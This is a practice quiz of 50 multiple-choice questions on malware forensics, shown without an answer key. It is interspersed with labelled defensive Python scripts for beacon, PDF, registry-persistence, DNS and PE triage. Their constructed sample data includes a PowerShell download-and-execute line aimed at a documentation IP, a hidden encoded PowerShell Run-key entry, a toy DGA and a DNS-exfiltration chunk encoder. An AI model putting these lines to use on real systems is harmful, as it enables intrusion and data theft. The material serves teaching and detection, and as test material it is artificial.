Unit 6 - Practice Quiz

INT250 50 Questions

1 What is the primary definition of malware in the context of digital evidence analysis?

A. Malicious software designed to disrupt, damage, or gain unauthorized access to a computer system
B. Network protocols used for secure communication
C. Software designed to improve system performance
D. Hardware components that fail due to overheating

2 Which of the following is a common technique used by attackers to spread malware via email?

A. Port Scanning
B. SQL Injection
C. Packet Sniffing
D. Phishing

3 What is a 'Drive-by Download'?

A. Manually downloading a file from an email
B. Downloading software from a physical drive
C. Unintended download of malicious code by visiting a compromised website
D. Copying files from a USB stick

4 Which term describes malicious advertisements used to distribute malware?

A. Adware
B. Ransomware
C. Spyware
D. Malvertising

5 What is the primary goal of Malware Forensics?

A. To increase network speed
B. To design new antivirus software
C. To repair broken hardware
D. To understand the capabilities, origin, and impact of a malicious sample

6 Which analysis type involves examining the malware without executing it?

A. Behavioral Analysis
B. Memory Forensics
C. Static Analysis
D. Dynamic Analysis

7 Which environment is most recommended for performing malware analysis to prevent infection of the host system?

A. Production Server
B. An isolated Virtual Machine (VM) or Sandbox
C. A public Wi-Fi network
D. The analyst's personal laptop

8 In Static Analysis, what is the purpose of calculating the file hash (MD5, SHA256)?

A. To decrypt the file
B. To execute the file safely
C. To compress the file size
D. To identify the file uniquely and check against databases like VirusTotal

9 What tool is commonly used in static analysis to extract readable text strings from a binary?

A. Process Monitor
B. Wireshark
C. Strings
D. Fiddler

10 What does 'packing' refer to in the context of malware?

A. Zipping a file for email
B. Compressing or encrypting the executable to hide its code and evade detection
C. Bundling malware with legitimate software
D. Adding more features to the malware

11 Which file format is the standard executable format for Windows, often analyzed during malware forensics?

A. Mach-O
B. PE (Portable Executable)
C. APK
D. ELF

12 When analyzing a suspicious PDF, what specific element is often looked for as a vector for malicious code?

A. Text formatting
B. Image resolution
C. Page margins
D. JavaScript

13 What is a common indicator of a malicious Microsoft Word document?

A. The document having a .docx extension
B. The presence of VBA Macros (Visual Basic for Applications)
C. The use of Arial font
D. The file size being under 1MB

14 Which tool is specifically designed to analyze the structure of OLE (Object Linking and Embedding) streams in Office documents?

A. Burp Suite
B. Metasploit
C. Nmap
D. Oledump.py

15 What is 'Dynamic Malware Analysis'?

A. Reading the source code
B. Scanning the file with an antivirus
C. Running the malware in a controlled environment to observe its behavior
D. Checking the file creation date

16 Which of the following is a risk associated with Dynamic Analysis?

A. It cannot identify network traffic
B. It is only useful for text files
C. It requires access to the source code
D. The malware might detect the virtual environment and stop running

17 What is the function of a 'snapshot' in a virtual machine during malware analysis?

A. To save the state of the VM so it can be reverted after infection
B. To print the code
C. To take a picture of the malware author
D. To record the network traffic

18 Which tool is widely used to monitor real-time file system, registry, and process activity on Windows?

A. VLC
B. Putty
C. FileZilla
D. Process Monitor (ProcMon)

19 In dynamic analysis, what does observing a change in the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' registry key usually indicate?

A. The system is updating
B. The browser is clearing cache
C. The screen resolution is changing
D. The malware is establishing persistence to run on startup

20 What is 'Process Injection'?

A. Monitoring a process for errors
B. Stopping a process efficiently
C. Code belonging to one process being written into the address space of another process
D. Installing a new process via CD

21 What is a 'Mutex' (Mutual Exclusion) object often used for by malware?

A. To connect to the internet
B. To delete system logs
C. To encrypt user files
D. To ensure only one instance of the malware runs at a time

22 Which network behavior is characteristic of C2 (Command and Control) communication?

A. Windows Update downloads
B. Local printing traffic
C. Periodic 'beaconing' signals to an external server
D. High bandwidth video streaming
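The beaconing pattern in question 22 is something an analyst can actually measure: a beacon produces outbound connections whose inter-arrival times are nearly constant. The script below is an added example, not part of the quiz or its course material; the log lines are constructed (RFC 5737 documentation addresses), and the log format, function names and thresholds are assumptions for illustration.

```python
"""Flag periodic (beacon-like) outbound connections in a connection log (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log (not real traffic): "<ISO timestamp> <src IP> <dst IP:port>".
# 192.0.2.0/24 and 198.51.100.0/24 are RFC 5737 documentation ranges.
# 198.51.100.7 is contacted every ~60 s; 198.51.100.9 is irregular noise.
SAMPLE_LOG = """\
2024-05-01T10:00:00 192.0.2.10 198.51.100.7:443
2024-05-01T10:00:04 192.0.2.10 198.51.100.9:443
2024-05-01T10:01:00 192.0.2.10 198.51.100.7:443
2024-05-01T10:01:31 192.0.2.10 198.51.100.9:443
2024-05-01T10:02:01 192.0.2.10 198.51.100.7:443
2024-05-01T10:02:05 192.0.2.10 198.51.100.9:443
2024-05-01T10:02:59 192.0.2.10 198.51.100.7:443
2024-05-01T10:03:50 192.0.2.10 198.51.100.9:443
2024-05-01T10:04:00 192.0.2.10 198.51.100.7:443
2024-05-01T10:05:00 192.0.2.10 198.51.100.7:443
"""

def parse_log(text):
    """Group connection timestamps by (source, destination)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, src, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(stamp))
    return flows

def beacon_score(timestamps, min_connections=5):
    """Return (mean interval in seconds, coefficient of variation), or None
    when there are too few connections to judge periodicity."""
    if len(timestamps) < min_connections:
        return None
    stamps = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    avg = mean(gaps)
    if avg <= 0:
        return None
    # A low coefficient of variation means a near-constant interval: beacon-like.
    return avg, pstdev(gaps) / avg

def find_beacons(text, max_cv=0.1, min_connections=5):
    """Return {(src, dst): (interval, cv)} for flows whose timing looks like a beacon."""
    hits = {}
    for key, stamps in parse_log(text).items():
        score = beacon_score(stamps, min_connections)
        if score is not None and score[1] <= max_cv:
            hits[key] = score
    return hits

if __name__ == "__main__":
    for (src, dst), (interval, cv) in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: every {interval:.0f}s (cv={cv:.2f})")
```

Real implants add jitter to their sleep interval, so in practice the `max_cv` threshold is looser, the analysis runs over hours rather than minutes, and known-good destinations (update servers, telemetry) are excluded first.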

23 What is the purpose of using 'FakeNet' or 'INetSim' during dynamic analysis?

A. To block all network traffic permanently
B. To hack into the malware author's computer
C. To simulate internet services (DNS, HTTP) so malware thinks it is online
D. To increase internet speed

24 What is a Fileless Malware attack?

A. Malware transmitted via paper
B. Malware that exists primarily in memory without writing an executable file to the disk
C. Malware that only targets empty files
D. Malware that deletes all files on a drive

25 Which term refers to legitimate system tools (like PowerShell) abused by fileless malware?

A. Firmware
B. Shareware
C. LOLBins (Living off the Land Binaries)
D. Bloatware

26 Which of the following is a common entry point for fileless malware?

A. Exploit kits targeting browser vulnerabilities
B. Installing a fresh OS
C. Connecting a printer
D. A physical CD-ROM

27 What is the role of WMI (Windows Management Instrumentation) in fileless attacks?

A. It manages the mouse pointer
B. It acts as a firewall
C. It is used for graphics rendering
D. It can be used to execute scripts and maintain persistence without files

28 How does Domain Generation Algorithm (DGA) help malware?

A. It speeds up the infection process
B. It generates many pseudo-random domain names (typically seeded by the date) so the malware can rendezvous with its C2 server, which defeats static blocklists
C. It encrypts the hard drive
D. It generates strong passwords for the user

29 Which tool is best suited for capturing and analyzing network packets during malware analysis?

A. RegEdit
B. Wireshark
C. Notepad++
D. Resource Hacker

30 What is 'import hashing' (Imphash)?

A. Hashing the user's password
B. Hashing the list of imported functions to identify related malware samples
C. Hashing the file name
D. Hashing the network traffic

31 What is a 'Trojan Horse'?

A. Hardware used to steal data
B. Malware that locks the screen
C. Self-replicating malware
D. Malware disguised as legitimate software to mislead users of its true intent

32 Which field of the PE header (in its COFF file header) records when the binary was compiled, a value the author can forge or zero out?

A. Pointer to Symbol Table
B. Subsystem
C. Machine Type
D. TimeDateStamp

33 What does the term 'Obfuscation' mean in malware analysis?

A. Translating the code to English
B. Deleting the code
C. Making the code difficult for humans and analysis tools to understand
D. Highlighting important code sections

34 In the context of PDF analysis, what is a '/OpenAction'?

A. A font style
B. A permission setting
C. A command to close the file
D. A command that specifies an action to perform immediately upon opening the document
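Questions 12, 34 and 39 describe what an analyst looks for in a PDF; the following is an added example of that triage, not code from the quiz or its course. It counts risky names the way pdfid does and handles one evasion a practitioner must expect: PDF name syntax allows `#xx` hex escapes, so `/J#61vaScript` is still `/JavaScript`. The sample PDF is constructed, and the function names are assumptions for illustration.

```python
"""pdfid-style keyword triage of a suspicious PDF, including hex-escaped names (added example)."""
import re
from typing import Dict, List

# Constructed minimal PDF (not a real sample): the catalog's /OpenAction points at a
# JavaScript action whose /S name is hidden with a PDF name escape (/J#61vaScript).
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert('triage me')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

SUSPICIOUS = ["/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
              "/EmbeddedFile", "/RichMedia", "/ObjStm", "/XFA"]

def normalise_names(data: bytes) -> bytes:
    """Decode #xx escapes (PDF name syntax) so /J#61vaScript reads as /JavaScript.
    Applied to the whole file, so a '#41' inside a string or stream is rewritten too;
    fine for counting keywords, not for reconstructing content."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def count_keywords(data: bytes) -> Dict[str, int]:
    """Count each suspicious name. Streams are not inflated, so names hidden inside
    /FlateDecode streams or object streams (/ObjStm) are not seen; a high /ObjStm
    count with few other hits is itself a reason to decompress and look again."""
    text = normalise_names(data)
    counts = {}
    for keyword in SUSPICIOUS:
        # A name ends at whitespace or a delimiter; the lookahead stops /JS matching /JScript.
        pattern = re.escape(keyword.encode()) + rb"(?![A-Za-z0-9])"
        counts[keyword] = len(re.findall(pattern, text))
    return counts

def triage(data: bytes) -> List[str]:
    """Human-readable findings; an empty list means nothing notable at this level."""
    counts = count_keywords(data)
    findings = []
    if counts["/OpenAction"] or counts["/AA"]:
        findings.append("automatic action on open/event")
    if counts["/JavaScript"] or counts["/JS"]:
        findings.append("embedded JavaScript")
    if counts["/Launch"]:
        findings.append("launch action (runs an external program)")
    if counts["/EmbeddedFile"]:
        findings.append("embedded file attachment")
    if normalise_names(data) != data:
        findings.append("hex-escaped names (possible keyword obfuscation)")
    return findings

if __name__ == "__main__":
    print(count_keywords(SAMPLE_PDF))
    print(triage(SAMPLE_PDF))
```

A hit on `/OpenAction` plus `/JavaScript` is the classic combination from question 34: the document runs script the moment it is opened, without any click. Extracting the script itself (and any shellcode it carries, question 39) is the next step and needs a real parser that decompresses streams.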

35 What is 'Sandboxing'?

A. Running a sample in an isolated, instrumented environment (usually automated) to record its behavior
B. Playing a game
C. Encrypting a hard drive
D. Cleaning the computer case

36 Which of the following is a symptom of Ransomware?

A. The computer shuts down randomly
B. The mouse moves slowly
C. Files are encrypted and a payment note is displayed
D. The web browser opens multiple tabs

37 What is the primary difference between a Virus and a Worm?

A. Worms are only for Linux
B. Viruses are hardware-based
C. Viruses encrypt files; Worms delete them
D. A virus attaches to a host file and needs a user action to spread; a worm propagates on its own across a network without a host file or user action

38 Why might an analyst check 'Imported Functions' (Imports) in the PE header?

A. To guess what the malware is capable of (e.g., networking, file manipulation)
B. To see the file size
C. To check the author's name
D. To see the icon

39 What does 'Shellcode' refer to in a malicious document?

A. The name of the file
B. The visual layout of the document
C. Machine code payload used to exploit a vulnerability
D. The password protection

40 Which tool allows an analyst to view active TCP and UDP connections in real-time on the host?

A. Notepad
B. TCPView
C. Calculator
D. Paint

41 What is 'DLL Injection'?

A. Renaming a DLL file
B. Removing a DLL file
C. Scanning DLLs for viruses
D. Forcing a process to load a malicious Dynamic Link Library (DLL)

42 What is the 'AutoOpen' macro in Word?

A. A macro that prints the file
B. A macro that runs automatically when a document is opened
C. A macro that saves the file
D. A macro that changes the font

43 How can fileless malware persist using the Windows Registry?

A. By storing malicious scripts in registry keys and invoking them via PowerShell
B. By changing the desktop background
C. By disabling the mouse
D. By deleting the registry
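Questions 19 and 43 describe the persistence pattern (a Run-key value that launches PowerShell, and a script body parked in another registry value); the following is an added example of detecting it in a Process Monitor CSV export, not code from the quiz or its course. The rows are constructed in ProcMon's export column order, the process and key names are invented for illustration, and the detection thresholds are assumptions.

```python
"""Spot Run-key persistence and encoded PowerShell in a ProcMon CSV export (added example)."""
import base64
import csv
import io
import re
from typing import Dict, List

# The encoded command decodes to a one-liner that reads a script body out of the registry.
_ENCODED = base64.b64encode(r"IEX (gp HKCU:\Software\Demo).Payload".encode("utf-16-le")).decode()

def _build_sample_csv() -> str:
    """Constructed rows (not a real capture) in ProcMon's CSV export column order.
    198.51.100.7 is an RFC 5737 documentation address."""
    rows = [
        ["Time of Day", "Process Name", "PID", "Operation", "Path", "Result", "Detail"],
        ["10:00:01.0000000", "explorer.exe", "1234", "RegQueryValue",
         r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "NAME NOT FOUND", "Length: 144"],
        ["10:00:02.0000000", "WINWORD.EXE", "5678", "RegSetValue",
         r"HKCU\Software\Demo\Payload", "SUCCESS",
         "Type: REG_SZ, Length: 92, Data: $u='http://198.51.100.7/s';IEX (New-Object Net.WebClient).DownloadString($u)"],
        ["10:00:03.0000000", "WINWORD.EXE", "5678", "RegSetValue",
         r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "SUCCESS",
         f"Type: REG_SZ, Length: 300, Data: powershell.exe -nop -w hidden -enc {_ENCODED}"],
        ["10:00:04.0000000", "Updater.exe", "9012", "RegSetValue",
         r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "SUCCESS",
         r"Type: REG_SZ, Length: 70, Data: C:\Program Files\Updater\Updater.exe /background"],
    ]
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()

SAMPLE_CSV = _build_sample_csv()

# Matches Run/RunOnce under HKCU or HKLM. Other autostart locations exist (services,
# scheduled tasks, Winlogon, WMI subscriptions); Sysinternals Autoruns enumerates them.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common spellings.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
SCRIPT_MARKERS = ("iex", "invoke-expression", "downloadstring", "frombase64string")

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries Base64 of the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")

def _data_field(detail: str) -> str:
    return detail.split("Data: ", 1)[1] if "Data: " in detail else ""

def find_persistence(csv_text: str) -> List[Dict[str, object]]:
    """Every successful Run-key write is reported (decoded if it carries -enc);
    writes elsewhere are reported only when the value looks like script."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "RegSetValue" or row["Result"] != "SUCCESS":
            continue
        data = _data_field(row["Detail"])
        finding = {"process": row["Process Name"], "path": row["Path"], "data": data, "decoded": None}
        if RUN_KEY.search(row["Path"]):
            finding["kind"] = "run_key"
            match = ENC_FLAG.search(data)
            if match:
                finding["decoded"] = decode_encoded_command(match.group(1))
            findings.append(finding)
        elif any(marker in data.lower() for marker in SCRIPT_MARKERS):
            finding["kind"] = "script_in_registry"
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in find_persistence(SAMPLE_CSV):
        print(f["kind"], f["process"], f["path"], f["decoded"] or f["data"])
```

Note who wrote the value: a Run-key write by WINWORD.EXE is the tell-tale of a macro (question 13), whereas the same key written by an installer is routine. The decoded command points at the second value, which is why the script-in-registry check reports writes outside the Run key as well.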

44 Which network protocol is commonly abused for data exfiltration because outbound queries are almost always allowed through firewalls?

A. DHCP
B. ICMP
C. ARP
D. DNS (Domain Name System)
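Questions 28 and 44 both come down to what a defender sees in DNS logs. The script below is an added example, not code from the quiz or its course: a toy date-seeded generator in the style of a DGA (it is not any real family's algorithm), a crude heuristic for DGA-looking names, and a check for tunnelling, where many long, unique subdomains under one parent carry Base32-encoded data out. The query log is constructed, the `.example` TLD is reserved for documentation, and the thresholds are assumptions.

```python
"""Toy DGA plus DNS-log heuristics for DGA lookups and tunnelling (added example)."""
import base64
import hashlib
import math
from collections import Counter, defaultdict
from datetime import date
from typing import Dict, List

def toy_dga(seed: str, day: date, count: int, tld: str = "example") -> List[str]:
    """Date-seeded generator in the style of a DGA (constructed for illustration).
    The malware and whoever holds the seed can both reproduce today's list, so the
    operator registers one domain from it and the bot finds it by trial."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day.isoformat()}|{i}".encode()).hexdigest()
        label = "".join(chr(ord("a") + int(digest[j:j + 2], 16) % 26) for j in range(0, 24, 2))
        domains.append(f"{label}.{tld}")
    return domains

def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

VOWELS = set("aeiou")

def looks_generated(label: str) -> bool:
    """Crude DGA heuristic: long, high-entropy label with few vowels or a long consonant run.
    Production detectors use n-gram or ML models trained on known families."""
    if len(label) < 10:
        return False
    run = longest = 0
    for ch in label:
        run = 0 if ch in VOWELS else run + 1
        longest = max(longest, run)
    vowel_ratio = sum(ch in VOWELS for ch in label) / len(label)
    return shannon_entropy(label) >= 2.5 and (vowel_ratio < 0.3 or longest >= 4)

def _encode_chunks(payload: bytes, size: int = 30) -> List[str]:
    """How a tunnelling client carries data out: Base32 chunks that fit in one DNS label."""
    return [base64.b32encode(payload[i:i + size]).decode().rstrip("=").lower()
            for i in range(0, len(payload), size)]

def analyse_dns(queries: List[str], min_unique: int = 5, min_avg_len: int = 30) -> Dict[str, List[str]]:
    """Return DGA-looking registrable domains and parents with many long unique subdomains.
    The registrable domain is approximated as the last two labels (no public-suffix list)."""
    dga, subs_by_parent = set(), defaultdict(set)
    for q in queries:
        labels = q.lower().rstrip(".").split(".")
        if len(labels) < 2:
            continue
        parent = ".".join(labels[-2:])
        if looks_generated(labels[-2]):
            dga.add(parent)
        for sub in labels[:-2]:
            subs_by_parent[parent].add(sub)
    tunnels = [p for p, subs in subs_by_parent.items()
               if len(subs) >= min_unique and sum(map(len, subs)) / len(subs) >= min_avg_len]
    return {"dga_suspects": sorted(dga), "tunnel_suspects": sorted(tunnels)}

# Constructed query log: ordinary internal names, five DGA lookups, and tunnelled chunks.
SAMPLE_QUERIES = (
    ["wiki.corp.example", "mail.corp.example", "wiki.corp.example", "documentserver.corp.example"]
    + toy_dga("demo-seed", date(2024, 5, 1), 5)
    + [f"{chunk}.exfil.example" for chunk in _encode_chunks(b"constructed secret payload " * 6)]
)

if __name__ == "__main__":
    print(analyse_dns(SAMPLE_QUERIES))
```

Two caveats a practitioner should keep in mind: legitimate CDNs and cloud services also produce long machine-generated labels, so these heuristics feed a review queue rather than a block rule, and a bot probing a DGA list shows up as a burst of NXDOMAIN responses, which is often the stronger signal than the names themselves.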

45 What is the purpose of 'API Hooking' in malware?

A. To intercept function calls between the system and applications to modify or monitor behavior
B. To organize files
C. To speed up the internet
D. To fix bugs in Windows

46 Which section of a PE file typically contains the executable code?

A. .text
B. .rsrc
C. .reloc
D. .data

47 When analyzing a suspicious URL found in malware, what should an analyst do?

A. Ignore it
B. Email the URL to friends
C. Open it in their personal browser immediately
D. Investigate it using reputation services or a safe sandbox environment

48 What is the primary characteristic of a 'Rootkit'?

A. It displays ads
B. It spreads via USB
C. It is designed to hide the existence of certain processes or programs from normal detection methods
D. It encrypts files

49 What is 'Entropy' used for in static malware analysis?

A. To measure the network speed
B. To measure the randomness of data, helping identify packed or encrypted code
C. To measure the file temperature
D. To count the lines of code
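Questions 8, 9, 10, 30, 32, 46 and 49 together describe a first static pass over a Windows executable; the script below is an added example of that pass, not code from the quiz or its course. It builds a constructed, non-executable PE32+ skeleton (a small `.text` section and a high-entropy section named `UPX1`, as a packer leaves it), then computes the file hashes, pulls printable strings the way `strings` does, reads TimeDateStamp, scores each section's entropy and computes an imphash over a hand-listed import set (the skeleton has no import table, so the import list is an assumption). Function names are illustrative; the imphash normalisation follows the pefile convention for named imports.

```python
"""Static triage of a PE file: hashes, strings, section entropy, build time, imphash (added example)."""
import hashlib
import math
import re
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Dict, List, Tuple

def _build_sample_pe() -> bytes:
    """Constructed PE32+ skeleton (headers only, not runnable): DOS header, PE signature,
    COFF header, zeroed optional header, two section headers, then the section data."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 1700000000, 0, 0, 240, 0x22)
    optional = struct.pack("<H", 0x20B) + b"\0" * 238                # PE32+ magic, rest zeroed
    def section(name, vaddr, size, raw_ptr):
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + coff + optional
               + section(b".text", 0x1000, 512, 0x200) + section(b"UPX1", 0x2000, 4096, 0x400))
    # 198.51.100.7 is an RFC 5737 documentation address.
    text = b"CreateRemoteThread\0WriteProcessMemory\0http://198.51.100.7/update.bin\0".ljust(512, b"\0")
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))   # 4 KiB, looks random
    return headers.ljust(0x200, b"\0") + text + packed

SAMPLE_PE = _build_sample_pe()

def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform random)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_pe(data: bytes) -> Dict[str, object]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, nsections, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    first_section = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, _, raw_size, raw_ptr, *_ = struct.unpack_from("<8sIIIIIIHHI", data, first_section + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": round(shannon_entropy(raw), 2)})
    return {"machine": hex(machine),
            # TimeDateStamp is seconds since the Unix epoch; trivially forged, so treat it as a hint.
            "compiled": datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat(),
            "sections": sections}

def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Same idea as the `strings` tool: runs of printable ASCII of at least min_len.
    Packed or encrypted regions yield junk runs too, so expect noise from UPX1."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def imphash(imports: List[Tuple[str, str]]) -> str:
    """MD5 over 'dll.function' pairs normalised as pefile does for named imports:
    DLL lower-cased with .dll/.ocx/.sys dropped, function lower-cased, comma-joined."""
    parts = []
    for dll, func in imports:
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if dll.endswith(ext):
                dll = dll[:-len(ext)]
                break
        parts.append(f"{dll}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()

def triage_pe(data: bytes) -> Dict[str, object]:
    info = parse_pe(data)
    sections = info["sections"]
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(),
            "compiled": info["compiled"],
            "sections": sections,
            "likely_packed": [s["name"] for s in sections if s["entropy"] > 7.0],
            "strings": extract_strings(data)}

if __name__ == "__main__":
    report = triage_pe(SAMPLE_PE)
    print(report["sha256"], report["compiled"], report["sections"], report["likely_packed"])
    # Assumed import set for the imphash demonstration; the skeleton has no import table.
    print(imphash([("KERNEL32.DLL", "CreateRemoteThread"), ("KERNEL32.DLL", "WriteProcessMemory")]))
```

The SHA-256 is what goes into VirusTotal or an internal database (question 8); an entropy above about 7.0 in a code section, especially one named `UPX0`/`UPX1`, is the packing signal from questions 10 and 49, and it also explains why `strings` finds little of use until the sample is unpacked; the imphash survives recompilation and string changes, which is why it groups related samples (question 30).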

50 Why is PowerShell frequently abused by fileless malware?

A. It is a game engine
B. It has deep access to the Windows API and system management functions, so an attacker can act without dropping a new binary to disk
C. It is not installed on most computers
D. It is a web browser